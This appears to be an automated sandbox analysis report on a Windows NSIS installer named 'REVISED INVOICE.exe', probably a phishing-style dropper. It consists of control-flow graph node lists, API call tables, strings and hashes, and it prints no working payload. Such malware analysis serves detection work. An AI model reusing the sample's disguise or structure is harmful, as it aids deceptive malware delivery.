3735->3739 3738 403d22 3736->3738 3737->3734 3738->3719 3738->3739 3771 4040bc 3739->3771 3741 403e96 GetDlgItem 3742 403eb3 ShowWindow KiUserCallbackDispatcher 3741->3742 3743 403eab 3741->3743 3768 404105 EnableWindow 3742->3768 3743->3742 3745 403edd EnableWindow 3749 403ef1 3745->3749 3746 403ef6 GetSystemMenu EnableMenuItem SendMessageW 3747 403f26 SendMessageW 3746->3747 3746->3749 3747->3749 3749->3746 3769 404118 SendMessageW 3749->3769 3770 40601f lstrcpynW 3749->3770 3751 403f54 lstrlenW 3752 406041 19 API calls 3751->3752 3753 403f6a SetWindowTextW 3752->3753 3754 401389 2 API calls 3753->3754 3754->3734 3755->3713 3756 403fc8 CreateDialogParamW 3755->3756 3756->3713 3757 403ffb 3756->3757 3758 4040e3 20 API calls 3757->3758 3759 404006 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3758->3759 3760 401389 2 API calls 3759->3760 3761 40404c 3760->3761 3761->3725 3762 404054 ShowWindow 3761->3762 3763 40412f SendMessageW 3762->3763 3764 40406c 3763->3764 3764->3713 3766 406041 19 API calls 3765->3766 3767 4040ee SetDlgItemTextW 3766->3767 3767->3741 3768->3745 3769->3749 3770->3751 3772 4040c3 3771->3772 3773 4040c9 SendMessageW 3771->3773 3772->3773 3773->3733 3775 404162 GetWindowLongW 3774->3775 3785 4041eb 3774->3785 3776 404173 3775->3776 3775->3785 3777 404182 GetSysColor 3776->3777 3778 404185 3776->3778 3777->3778 3779 404195 SetBkMode 3778->3779 3780 40418b SetTextColor 3778->3780 3781 4041b3 3779->3781 3782 4041ad GetSysColor 3779->3782 3780->3779 3783 4041c4 3781->3783 3784 4041ba SetBkColor 3781->3784 3782->3781 3783->3785 3786 4041d7 DeleteObject 3783->3786 3787 4041de CreateBrushIndirect 3783->3787 3784->3783 3785->3725 3786->3787 3787->3785 4432 401491 4433 40517e 26 API calls 4432->4433 4434 401498 4433->4434 3819 402095 3820 402bbf 19 API calls 3819->3820 3821 40209c 3820->3821 3822 402bbf 19 API calls 3821->3822 3823 4020a6 3822->3823 3824 402bbf 19 API calls 3823->3824 3825 4020b0 3824->3825 3826 402bbf 19 API calls 3825->3826 3827 4020ba 3826->3827 3828 402bbf 19 API calls 3827->3828 3830 4020c4 3828->3830 3829 402103 CoCreateInstance 3834 402122 3829->3834 3830->3829 3831 402bbf 19 API calls 3830->3831 3831->3829 3832 401423 26 API calls 3833 4021e1 3832->3833 3834->3832 3834->3833 4435 401a15 4436 402bbf 19 API calls 4435->4436 4437 401a1e ExpandEnvironmentStringsW 4436->4437 4438 401a32 4437->4438 4439 401a45 4437->4439 4438->4439 4440 401a37 lstrcmpW 4438->4440 4440->4439 4441 402515 4442 402bbf 19 API calls 4441->4442 4443 40251c 4442->4443 4446 405bf4 GetFileAttributesW CreateFileW 4443->4446 4445 402528 4446->4445 4447 401b16 4448 402bbf 19 API calls 4447->4448 4449 401b1d 4448->4449 4450 402ba2 19 API calls 4449->4450 4451 401b26 wsprintfW 4450->4451 4452 402a4c 4451->4452 4453 406b18 4454 406567 4453->4454 4454->4454 4455 4065f1 GlobalAlloc 4454->4455 4456 4065e8 GlobalFree 4454->4456 4457 406ed2 4454->4457 4458 406668 GlobalAlloc 4454->4458 4459 40665f GlobalFree 4454->4459 4455->4454 4455->4457 4456->4455 4458->4454 4458->4457 4459->4458 3965 40159b 3966 402bbf 19 API calls 3965->3966 3967 4015a2 SetFileAttributesW 3966->3967 3968 4015b4 3967->3968 3977 40229d 3978 4022a5 3977->3978 3980 4022ab 3977->3980 3979 402bbf 19 API calls 3978->3979 3979->3980 3981 402bbf 19 API calls 3980->3981 3982 4022b9 3980->3982 3981->3982 3983 4022c7 3982->3983 3985 402bbf 19 API calls 3982->3985 3984 402bbf 19 API calls 3983->3984 3986 4022d0 WritePrivateProfileStringW 3984->3986 3985->3983 4467 401f1d 4468 402bbf 19 API calls 4467->4468 4469 401f24 4468->4469 4470 4063f5 5 API calls 4469->4470 4471 401f33 4470->4471 4472 401f4f GlobalAlloc 4471->4472 4481 401fb7 4471->4481 4473 401f63 4472->4473 4472->4481 4474 4063f5 5 API calls 4473->4474 4475 401f6a 4474->4475 4476 4063f5 5 API calls 4475->4476 4477 401f74 4476->4477 4477->4481 4482 405f66 wsprintfW 4477->4482 4479 401fa9 4483 405f66 wsprintfW 4479->4483 4482->4479 4483->4481 4484 40149e 4485 402288 4484->4485 4486 4014ac PostQuitMessage 4484->4486 4486->4485 4487 40249e 4488 402cc9 20 API calls 4487->4488 4489 4024a8 4488->4489 4490 402ba2 19 API calls 4489->4490 4491 4024b1 4490->4491 4492 4024d5 RegEnumValueW 4491->4492 4493 4024c9 RegEnumKeyW 4491->4493 4495 40281e 4491->4495 4494 4024ee RegCloseKey 4492->4494 4492->4495 4493->4494 4494->4495 4009 40231f 4010 402324 4009->4010 4011 40234f 4009->4011 4012 402cc9 20 API calls 4010->4012 4013 402bbf 19 API calls 4011->4013 4014 40232b 4012->4014 4015 402356 4013->4015 4016 402335 4014->4016 4020 40236c 4014->4020 4021 402bff RegOpenKeyExW 4015->4021 4017 402bbf 19 API calls 4016->4017 4018 40233c RegDeleteValueW RegCloseKey 4017->4018 4018->4020 4022 402c93 4021->4022 4028 402c2a 4021->4028 4022->4020 4023 402c50 RegEnumKeyW 4024 402c62 RegCloseKey 4023->4024 4023->4028 4026 4063f5 5 API calls 4024->4026 4025 402c87 RegCloseKey 4031 402c76 4025->4031 4029 402c72 4026->4029 4027 402bff 5 API calls 4027->4028 4028->4023 4028->4024 4028->4025 4028->4027 4030 402ca2 RegDeleteKeyW 4029->4030 4029->4031 4030->4031 4031->4022 4504 401ca3 4505 402ba2 19 API calls 4504->4505 4506 401ca9 IsWindow 4505->4506 4507 401a05 4506->4507 4508 403826 4509 403831 4508->4509 4510 403835 4509->4510 4511 403838 GlobalAlloc 4509->4511 4511->4510 4512 402a27 SendMessageW 4513 402a41 InvalidateRect 4512->4513 4514 402a4c 4512->4514 4513->4514 3678 40242a 3689 402cc9 3678->3689 3680 402434 3681 402bbf 19 API calls 3680->3681 3682 40243d 3681->3682 3683 402448 RegQueryValueExW 3682->3683 3688 40281e 3682->3688 3684 40246e RegCloseKey 3683->3684 3685 402468 3683->3685 3684->3688 3685->3684 3693 405f66 wsprintfW 3685->3693 3690 402bbf 19 API calls 3689->3690 3691 402ce2 3690->3691 3692 402cf0 RegOpenKeyExW 3691->3692 3692->3680 3693->3684 4515 40172d 4516 402bbf 19 API calls 4515->4516 4517 401734 SearchPathW 4516->4517 4518 40174f 4517->4518 4526 404231 lstrlenW 4527 404250 4526->4527 4528 404252 WideCharToMultiByte 4526->4528 4527->4528 4529 4027b4 4530 4027ba 4529->4530 4531 4027c2 FindClose 4530->4531 4532 402a4c 4530->4532 4531->4532 4533 404537 4534 404547 4533->4534 4535 40456d 4533->4535 4537 4040e3 20 API calls 4534->4537 4536 40414a 8 API calls 4535->4536 4538 404579 4536->4538 4539 404554 SetDlgItemTextW 4537->4539 4539->4535 4540 401b37 4541 401b44 4540->4541 4542 401b88 4540->4542 4543 401bcd 4541->4543 4549 401b5b 4541->4549 4544 401bb2 GlobalAlloc 4542->4544 4545 401b8d 4542->4545 4547 406041 19 API calls 4543->4547 4553 402288 4543->4553 4546 406041 19 API calls 4544->4546 4545->4553 4561 40601f lstrcpynW 4545->4561 4546->4543 4548 402282 4547->4548 4555 405764 MessageBoxIndirectW 4548->4555 4559 40601f lstrcpynW 4549->4559 4551 401b9f GlobalFree 4551->4553 4554 401b6a 4560 40601f lstrcpynW 4554->4560 4555->4553 4557 401b79 4562 40601f lstrcpynW 4557->4562 4559->4554 4560->4557 4561->4551 4562->4553 4563 402537 4564 402562 4563->4564 4565 40254b 4563->4565 4567 402596 4564->4567 4568 402567 4564->4568 4566 402ba2 19 API calls 4565->4566 4574 402552 4566->4574 4569 402bbf 19 API calls 4567->4569 4570 402bbf 19 API calls 4568->4570 4572 40259d lstrlenW 4569->4572 4571 40256e WideCharToMultiByte lstrlenA 4570->4571 4571->4574 4572->4574 4573 4025e0 4574->4573 4576 405cd5 5 API calls 4574->4576 4577 4025ca 4574->4577 4575 405ca6 WriteFile 4575->4573 4576->4577 4577->4573 4577->4575 4578 4014b8 4579 4014be 4578->4579 4580 401389 2 API calls 4579->4580 4581 4014c6 4580->4581 3849 4015b9 3850 402bbf 19 API calls 3849->3850 3851 4015c0 3850->3851 3852 405a7e 4 API calls 3851->3852 3864 4015c9 3852->3864 3853 401629 3855 40165b 3853->3855 3856 40162e 3853->3856 3854 405a00 CharNextW 3854->3864 3858 401423 26 API calls 3855->3858 3857 401423 26 API calls 3856->3857 3859 401635 3857->3859 3867 401653 3858->3867 3869 40601f lstrcpynW 3859->3869 3861 4056ca 2 API calls 3861->3864 3862 4056e7 5 API calls 3862->3864 3863 401642 SetCurrentDirectoryW 3863->3867 3864->3853 3864->3854 3864->3861 3864->3862 3865 40160f GetFileAttributesW 3864->3865 3866 4015f2 3864->3866 3865->3864 3866->3864 3868 40564d 4 API calls 3866->3868 3868->3866 3869->3863 4582 40293b 4583 402ba2 19 API calls 4582->4583 4584 402941 4583->4584 4585 402964 4584->4585 4586 40297d 4584->4586 4593 40281e 4584->4593 4587 402969 4585->4587 4588 40297a 4585->4588 4589 402993 4586->4589 4590 402987 4586->4590 4596 40601f lstrcpynW 4587->4596 4597 405f66 wsprintfW 4588->4597 4592 406041 19 API calls 4589->4592 4591 402ba2 19 API calls 4590->4591 4591->4593 4592->4593 4596->4593 4597->4593 4598 4052bd 4599 405467 4598->4599 4600 4052de GetDlgItem GetDlgItem GetDlgItem 4598->4600 4602 405470 GetDlgItem CreateThread CloseHandle 4599->4602 4603 405498 4599->4603 4643 404118 SendMessageW 4600->4643 4602->4603 4605 4054c3 4603->4605 4606 4054e8 4603->4606 4607 4054af ShowWindow ShowWindow 4603->4607 4604 40534e 4609 405355 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4604->4609 4608 405523 4605->4608 4611 4054d7 4605->4611 4612 4054fd ShowWindow 4605->4612 4613 40414a 8 API calls 4606->4613 4645 404118 SendMessageW 4607->4645 4608->4606 4616 405531 SendMessageW 4608->4616 4614 4053c3 4609->4614 4615 4053a7 SendMessageW SendMessageW 4609->4615 4617 4040bc SendMessageW 4611->4617 4619 40551d 4612->4619 4620 40550f 4612->4620 4618 4054f6 4613->4618 4623 4053d6 4614->4623 4624 4053c8 SendMessageW 4614->4624 4615->4614 4616->4618 4625 40554a CreatePopupMenu 4616->4625 4617->4606 4622 4040bc SendMessageW 4619->4622 4621 40517e 26 API calls 4620->4621 4621->4619 4622->4608 4627 4040e3 20 API calls 4623->4627 4624->4623 4626 406041 19 API calls 4625->4626 4628 40555a AppendMenuW 4626->4628 4629 4053e6 4627->4629 4630 405577 GetWindowRect 4628->4630 4631 40558a TrackPopupMenu 4628->4631 4632 405423 GetDlgItem SendMessageW 4629->4632 4633 4053ef ShowWindow 4629->4633 4630->4631 4631->4618 4635 4055a5 4631->4635 4632->4618 4634 40544a SendMessageW SendMessageW 4632->4634 4636 405412 4633->4636 4637 405405 ShowWindow 4633->4637 4634->4618 4638 4055c1 SendMessageW 4635->4638 4644 404118 SendMessageW 4636->4644 4637->4636 4638->4638 4639 4055de OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4638->4639 4641 405603 SendMessageW 4639->4641 4641->4641 4642 40562c GlobalUnlock SetClipboardData CloseClipboard 4641->4642 4642->4618 4643->4604 4644->4632 4645->4605

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 40326a-40329c SetErrorMode GetVersion 1 40329e-4032a6 call 4063f5 0->1 2 4032af-403342 call 406389 * 3 call 4063f5 * 2 #17 OleInitialize SHGetFileInfoW call 40601f GetCommandLineW call 40601f GetModuleHandleW 0->2 1->2 7 4032a8 1->7 20 403344-40334b 2->20 21 40334c-403366 call 405a00 CharNextW 2->21 7->2 20->21 24 40336c-403372 21->24 25 40347e-403498 GetTempPathW call 403239 21->25 26 403374-403379 24->26 27 40337b-403381 24->27 32 4034f0-40350a DeleteFileW call 402dee 25->32 33 40349a-4034b8 GetWindowsDirectoryW lstrcatW call 403239 25->33 26->26 26->27 30 403383-403387 27->30 31 403388-40338c 27->31 30->31 34 403392-403398 31->34 35 40344a-403457 call 405a00 31->35 53 403510-403516 32->53 54 4035bb-4035cc call 40378e OleUninitialize 32->54 33->32 49 4034ba-4034ea GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403239 33->49 39 4033b2-4033eb 34->39 40 40339a-4033a1 34->40 51 403459-40345a 35->51 52 40345b-403461 35->52 46 403408-403442 39->46 47 4033ed-4033f2 39->47 44 4033a3-4033a6 40->44 45 4033a8 40->45 44->39 44->45 45->39 46->35 50 403444-403448 46->50 47->46 48 4033f4-4033fc 47->48 56 403403 48->56 57 4033fe-403401 48->57 49->32 49->54 50->35 59 403469-403477 call 40601f 50->59 51->52 52->24 60 403467 52->60 61 4035ab-4035b2 call 403868 53->61 62 40351c-403527 call 405a00 53->62 69 4036f2-4036f8 54->69 70 4035d2-4035e2 call 405764 ExitProcess 54->70 56->46 57->46 57->56 65 40347c 59->65 60->65 72 4035b7 61->72 76 403575-40357f 62->76 77 403529-40355e 62->77 65->25 74 403776-40377e 69->74 75 4036fa-403710 GetCurrentProcess OpenProcessToken 69->75 72->54 78 403780 74->78 79 403784-403788 ExitProcess 74->79 83 403712-403740 LookupPrivilegeValueW AdjustTokenPrivileges 75->83 84 403746-403754 call 4063f5 75->84 81 403581-40358f call 405adb 76->81 82 4035e8-4035fc call 4056e7 lstrcatW 76->82 85 403560-403564 77->85 78->79 81->54 95 403591-4035a7 call 40601f * 2 81->95 96 403609-403623 lstrcatW lstrcmpiW 82->96 97 4035fe-403604 lstrcatW 82->97 83->84 98 403762-40376d ExitWindowsEx 84->98 99 403756-403760 84->99 86 403566-40356b 85->86 87 40356d-403571 85->87 86->87 91 403573 86->91 87->85 87->91 91->76 95->61 96->54 102 403625-403628 96->102 97->96 98->74 100 40376f-403771 call 40140b 98->100 99->98 99->100 100->74 105 403631 call 4056ca 102->105 106 40362a-40362f call 40564d 102->106 111 403636-403644 SetCurrentDirectoryW 105->111 106->111 114 403651-40367a call 40601f 111->114 115 403646-40364c call 40601f 111->115 119 40367f-40369b call 406041 DeleteFileW 114->119 115->114 122 4036dc-4036e4 119->122 123 40369d-4036ad CopyFileW 119->123 122->119 124 4036e6-4036ed call 405ec0 122->124 123->122 125 4036af-4036cf call 405ec0 call 406041 call 4056ff 123->125 124->54 125->122 134 4036d1-4036d8 CloseHandle 125->134 134->122
                                                                                                APIs
                                                                                                • SetErrorMode.KERNELBASE ref: 0040328C
                                                                                                • GetVersion.KERNEL32 ref: 00403292
                                                                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032E2
                                                                                                • OleInitialize.OLE32(00000000), ref: 004032E9
                                                                                                • SHGetFileInfoW.SHELL32(004206C8,00000000,?,000002B4,00000000), ref: 00403305
                                                                                                • GetCommandLineW.KERNEL32(00428220,NSIS Error), ref: 0040331A
                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000), ref: 0040332D
                                                                                                • CharNextW.USER32(00000000), ref: 00403354
                                                                                                  • Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
                                                                                                  • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406422
                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348F
                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034A0
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034AC
                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 004034C0
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C8
                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D9
                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034E1
                                                                                                • DeleteFileW.KERNEL32(1033), ref: 004034F5
                                                                                                  • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
                                                                                                • OleUninitialize.OLE32(?), ref: 004035C0
                                                                                                • ExitProcess.KERNEL32 ref: 004035E2
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000,?), ref: 004035F5
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000,?), ref: 00403604
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000,?), ref: 0040360F
                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REVISED INVOICE.exe",00000000,?), ref: 0040361B
                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403637
                                                                                                • DeleteFileW.KERNEL32(0041FEC8,0041FEC8,?,0042A000,?), ref: 00403691
                                                                                                • CopyFileW.KERNEL32 ref: 004036A5
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004036D2
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403701
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403708
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040371D
                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403740
                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403765
                                                                                                • ExitProcess.KERNEL32 ref: 00403788
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                • String ID: "C:\Users\user\Desktop\REVISED INVOICE.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\fona\Kvit$C:\Users\user\AppData\Local\fona\Kvit$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                • API String ID: 3586999533-2447905027
                                                                                                • Opcode ID: 18b875ca129c5a4b12c60ae53fdc6c4b39169b05244e9a0f0d81940a8b3f60a9
                                                                                                • Instruction ID: 47b2dd04bf5340fec55df09ad24e258ddf9dfe897e1895205e314fce2ef220c4
                                                                                                • Opcode Fuzzy Hash: 18b875ca129c5a4b12c60ae53fdc6c4b39169b05244e9a0f0d81940a8b3f60a9
                                                                                                • Instruction Fuzzy Hash: 08D12770604200BAD720BF659D49A3B3AACEB4170AF50487FF441B61D2DB7D9941CB6E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 135 404afa-404b46 GetDlgItem * 2 136 404d67-404d6e 135->136 137 404b4c-404be0 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->137 138 404d70-404d80 136->138 139 404d82 136->139 140 404be2-404bed SendMessageW 137->140 141 404bef-404bf6 DeleteObject 137->141 142 404d85-404d8e 138->142 139->142 140->141 143 404bf8-404c00 141->143 144 404d90-404d93 142->144 145 404d99-404d9f 142->145 146 404c02-404c05 143->146 147 404c29-404c2d 143->147 144->145 151 404e7d-404e84 144->151 148 404da1-404da8 145->148 149 404dae-404db5 145->149 152 404c07 146->152 153 404c0a-404c27 call 406041 SendMessageW * 2 146->153 147->143 150 404c2f-404c5b call 4040e3 * 2 147->150 148->149 148->151 155 404db7-404dba 149->155 156 404e2a-404e2d 149->156 191 404c61-404c67 150->191 192 404d26-404d39 GetWindowLongW SetWindowLongW 150->192 158 404ef5-404efd 151->158 159 404e86-404e8c 151->159 152->153 153->147 164 404dc5-404dda call 404a48 155->164 165 404dbc-404dc3 155->165 156->151 160 404e2f-404e39 156->160 162 404f07-404f0e 158->162 163 404eff-404f05 SendMessageW 158->163 167 404e92-404e9c 159->167 168 4050dd-4050ef call 40414a 159->168 170 404e49-404e53 160->170 171 404e3b-404e47 SendMessageW 160->171 172 404f10-404f17 162->172 173 404f42-404f49 162->173 163->162 164->156 190 404ddc-404ded 164->190 165->156 165->164 167->168 176 404ea2-404eb1 SendMessageW 167->176 170->151 178 404e55-404e5f 170->178 171->170 179 404f20-404f27 172->179 180 404f19-404f1a ImageList_Destroy 172->180 183 40509f-4050a6 173->183 184 404f4f-404f5b call 4011ef 173->184 176->168 185 404eb7-404ec8 SendMessageW 176->185 186 404e70-404e7a 178->186 187 404e61-404e6e 178->187 188 404f30-404f3c 179->188 189 404f29-404f2a GlobalFree 179->189 180->179 183->168 196 4050a8-4050af 183->196 209 404f6b-404f6e 184->209 210 404f5d-404f60 184->210 194 404ed2-404ed4 185->194 195 404eca-404ed0 185->195 186->151 187->151 188->173 189->188 190->156 198 404def-404df1 190->198 199 404c6a-404c71 191->199 197 404d3f-404d43 192->197 201 404ed5-404eee call 401299 SendMessageW 194->201 195->194 195->201 196->168 202 4050b1-4050db ShowWindow GetDlgItem ShowWindow 196->202 203 404d45-404d58 ShowWindow call 404118 197->203 204 404d5d-404d65 call 404118 197->204 205 404df3-404dfa 198->205 206 404e04 198->206 207 404d07-404d1a 199->207 208 404c77-404c9f 199->208 201->158 202->168 203->168 204->136 218 404e00-404e02 205->218 219 404dfc-404dfe 205->219 222 404e07-404e23 call 40117d 206->222 207->199 213 404d20-404d24 207->213 220 404ca1-404cd7 SendMessageW 208->220 221 404cd9-404cdb 208->221 214 404f70-404f89 call 4012e2 call 401299 209->214 215 404faf-404fd3 call 4011ef 209->215 223 404f62 210->223 224 404f63-404f66 call 404ac8 210->224 213->192 213->197 242 404f99-404fa8 SendMessageW 214->242 243 404f8b-404f91 214->243 237 405075-405089 InvalidateRect 215->237 238 404fd9 215->238 218->222 219->222 220->207 230 404cdd-404cec SendMessageW 221->230 231 404cee-404d04 SendMessageW 221->231 222->156 223->224 224->209 230->207 231->207 237->183 240 40508b-40509a call 404a1b call 404a03 237->240 241 404fdc-404fe7 238->241 240->183 244 404fe9-404ff8 241->244 245 40505d-40506f 241->245 242->215 249 404f93 243->249 250 404f94-404f97 243->250 247 404ffa-405007 244->247 248 40500b-40500e 244->248 245->237 245->241 247->248 252 405010-405013 248->252 253 405015-40501e 248->253 249->250 250->242 250->243 255 405023-40505b SendMessageW * 2 252->255 253->255 256 405020 253->256 255->245 256->255
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B12
                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B1D
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B67
                                                                                                • LoadBitmapW.USER32 ref: 00404B7A
                                                                                                • SetWindowLongW.USER32(?,000000FC,004050F2), ref: 00404B93
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BA7
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB9
                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCF
                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BDB
                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404BED
                                                                                                • DeleteObject.GDI32(00000000), ref: 00404BF0
                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C1B
                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C27
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CBD
                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE8
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CFC
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D2B
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D39
                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D4A
                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E47
                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EAC
                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EC1
                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EE5
                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F05
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F1A
                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F2A
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FA3
                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040504C
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040505B
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040507B
                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050C9
                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004050D4
                                                                                                • ShowWindow.USER32(00000000), ref: 004050DB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $M$N
                                                                                                • API String ID: 1638840714-813528018
                                                                                                • Opcode ID: 00f807dd19097039cdfae8d42ef0864fc158edb6895af2579c06ee0ad68b6d60
                                                                                                • Instruction ID: d9c0fbcad293e7aaadacffa1f228c55c0cff6ebba89157b443eef3cf19c2f35f
                                                                                                • Opcode Fuzzy Hash: 00f807dd19097039cdfae8d42ef0864fc158edb6895af2579c06ee0ad68b6d60
                                                                                                • Instruction Fuzzy Hash: AF026FB0A00209EFDB209F54DD85AAE7BB5FB84314F10857AF610BA2E1D7799D42CF58

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
